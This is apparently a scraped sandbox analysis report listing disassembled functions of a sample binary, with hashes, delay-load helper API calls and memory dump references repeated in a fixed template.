API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1eeedc9c6a582e6f272d5afd023069f3d521eefed324c6cabde9ae6069992c23
Instruction ID: ecb7c5481fa28713ddeebe8c384fe8eb0bccc1d287ef4cedbee7963779fcfb96
Opcode Fuzzy Hash: 1eeedc9c6a582e6f272d5afd023069f3d521eefed324c6cabde9ae6069992c23
Instruction Fuzzy Hash: 89B012D135E380BC3144520BAC02E3B010CC2C3B10330813EFC09C02C1DC407EC52831

Function 00CCE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 19a5548254f62c665fa35bb69daced92b7917a2dc9faa0784a92e08b3cd74608
Instruction ID: efe034faa9bc46f8237515b3cbbfbe510a56545edd7dc39d0d7f1d6a5f1e7ef1
Opcode Fuzzy Hash: 19a5548254f62c665fa35bb69daced92b7917a2dc9faa0784a92e08b3cd74608
Instruction Fuzzy Hash: C0B012E125E140BC3504510BAC02E3B014CC1C3F10330803EFC05C01C2DC40BF812831

Function 00CCE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8311da9aea7891ce8c56f6dc2b9a32fd8c45ff8966436cfdbcbd0b0ca5c94ff3
Instruction ID: a048bc590dcd5c0b9bfca824fe7ac010d7d18f491754598b6ff26ab29bc72878
Opcode Fuzzy Hash: 8311da9aea7891ce8c56f6dc2b9a32fd8c45ff8966436cfdbcbd0b0ca5c94ff3
Instruction Fuzzy Hash: 31B012E125E240BC3144510BAC02E3B010CC1C2F10330413EFC05C01C2DC407FC16831

Function 00CCE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1bca005109940563e9898cacd776ce60c01fcae968928398d10c81bb27a6d73
Instruction ID: 864c87b186596707f661c636bef174520989dbab1537f7914369fbd79eaa0ae8
Opcode Fuzzy Hash: a1bca005109940563e9898cacd776ce60c01fcae968928398d10c81bb27a6d73
Instruction Fuzzy Hash: 05B012E125E140BC3104510BAC02E3B010CC1C2F10330403EF805C01C2DC407F812831

Function 00CCE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc58de889b58b95930c80444e1b5a46659a40e7694b60e2e1dc9792f22df4a6a
Instruction ID: 7382b69f2c775678db2ee242f99f3514e0c17c1844ce49568ef6e26b41511b0b
Opcode Fuzzy Hash: fc58de889b58b95930c80444e1b5a46659a40e7694b60e2e1dc9792f22df4a6a
Instruction Fuzzy Hash: A3B012E129E140BC3104510BAD02E3B010CC1C2F10330403EF805C01C2DC407F822831

Function 00CCE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 33602ec614b0bf8af6749687544b047c1a21a720103f2d3be15a6f61f754f7dc
Instruction ID: b5cc1caf6dfa7e30efeaf803083f9989f60cd1056083d8f84179e531ff80b4c0
Opcode Fuzzy Hash: 33602ec614b0bf8af6749687544b047c1a21a720103f2d3be15a6f61f754f7dc
Instruction Fuzzy Hash: 0AB012E12591C0BC3304910AAC03E37024CC1C6B10330C13EF804C11C0DC405C451433

Function 00CCE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d49d285f94631fa95a9230e227472e5ae288d633156527eecf6483c353dad09
Instruction ID: 213345bc97b17308ccdab87a4f4f95cea9f5ce369304771d2ff5581672a68cee
Opcode Fuzzy Hash: 8d49d285f94631fa95a9230e227472e5ae288d633156527eecf6483c353dad09
Instruction Fuzzy Hash: 2AB012E13591C07C3304510AAD03E77024CC1C6B10330C03EF504D11C0DC401C4A1433

Function 00CCE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 96f0c9acbdaeda2b4018d13bf0d9b02a110d5cda4f63c730a3219f6f631e375c
Instruction ID: 6b57e7c380fa00acf77020ab825d18dfc4c85f71cf151f9b175f3a50a3a2ddd0
Opcode Fuzzy Hash: 96f0c9acbdaeda2b4018d13bf0d9b02a110d5cda4f63c730a3219f6f631e375c
Instruction Fuzzy Hash: 13B012F12590C0BC3304910AEC03E37028CC0C6F10330803EF804C11C1DC405E411433

Function 00CCE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE580

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 446f35a3f0c0829c532d91b0f2226fd7a539097fbcbed3088cf69c398d01e4b8
Instruction ID: c2c313c1dc218eef29b71450582142e540995d867039cbac83febc0c6961d221
Opcode Fuzzy Hash: 446f35a3f0c0829c532d91b0f2226fd7a539097fbcbed3088cf69c398d01e4b8
Instruction Fuzzy Hash: 8DB012C23691407E3104925BAC42E37011CC0C2B14330403EF404C11C0EC440C811531

Function 00CCE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE580

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a41bf35dbe5b22b2f9d1e64c7c9a67f6087c75edea82d7fe8ca4c0b4101f0736
Instruction ID: e28b9acc06b43c07233353d4908961b1f0679467814d4de68fe466789434e29f
Opcode Fuzzy Hash: a41bf35dbe5b22b2f9d1e64c7c9a67f6087c75edea82d7fe8ca4c0b4101f0736
Instruction Fuzzy Hash: D5B012C22A91407C3104915BED42E37012CC0C2B14330423EF404C11C0EC440D821531

Function 00CCE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE580

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a8f37a70103835f2d16d86d4001929c88148015000012a117c2602aa10c69e6c
Instruction ID: 6763a49c916095b590a86f2646e5abce20331b2e18c8ef4b401208f11c4587d5
Opcode Fuzzy Hash: a8f37a70103835f2d16d86d4001929c88148015000012a117c2602aa10c69e6c
Instruction Fuzzy Hash: 0EB012C22692407C3144915BEC43E37012CC0C2B14330423EF804C11C0EC440CC11531

Function 00CCE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d48e74b56fa4b87eddb38f80606997d87c2df2136c4c50a827ecb678a245fac8
Instruction ID: 0e80c5fe5203d51305936f7369f3ee188f93d6e8dc3855b46c5feb9907d06a3f
Opcode Fuzzy Hash: d48e74b56fa4b87eddb38f80606997d87c2df2136c4c50a827ecb678a245fac8
Instruction Fuzzy Hash: CBB012C1259240BC3204520EEC03E3B054CC0C7F14330423EF404C01C0EC400D851431

Function 00CCE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f8845af692487e5626458f689209f8abf9b6e3375238714e67a30200eca0e3f5
Instruction ID: d6c02e351929cd9759d6591211e5460b248188ad4f6bf87a4d45b703c9d5ee17
Opcode Fuzzy Hash: f8845af692487e5626458f689209f8abf9b6e3375238714e67a30200eca0e3f5
Instruction Fuzzy Hash: BDB012C1259140BC3104522AAC06E3B010CC0C3F14330403EF414C04C1EC400D451431

Function 00CCE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b5b8a1fdda0cbcbf668a6f86263372b12e0e7b797cd184b0dcafbb7120d78c82
Instruction ID: 7ef7c2e4d7936b4774bb326eb17620c84f2dbc75c4d42a7fc3470788213f7b91
Opcode Fuzzy Hash: b5b8a1fdda0cbcbf668a6f86263372b12e0e7b797cd184b0dcafbb7120d78c82
Instruction Fuzzy Hash: D9B012C1759180BD3104520EAD02E3B054CC0C7F14330803EF404C01C0EC400C421431

Function 00CCE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 308f833f41ab627fa8138252d269599627f6fc6eea340fc0fb8b082bae7acef7
Instruction ID: 4725efecfdbed1096429c5cceb3263aa453581ede6406dafcee7ba7fbec1daa3
Opcode Fuzzy Hash: 308f833f41ab627fa8138252d269599627f6fc6eea340fc0fb8b082bae7acef7
Instruction Fuzzy Hash: 61B012C1759140BE3104920EAC02F3B014CC0C7F14330403EF404C01C0EC400C411431

Function 00CCE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c92cbb80bf80a5dd20944d6f134612469a68b6ea7c9dc3ac0cbd094257bc6a6
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 0c92cbb80bf80a5dd20944d6f134612469a68b6ea7c9dc3ac0cbd094257bc6a6
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 18b8b51339e80e662ebaad874a1294890f7bead6a18e66c558fc732ddb17d22d
Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
Opcode Fuzzy Hash: 18b8b51339e80e662ebaad874a1294890f7bead6a18e66c558fc732ddb17d22d
Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871

Function 00CCE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

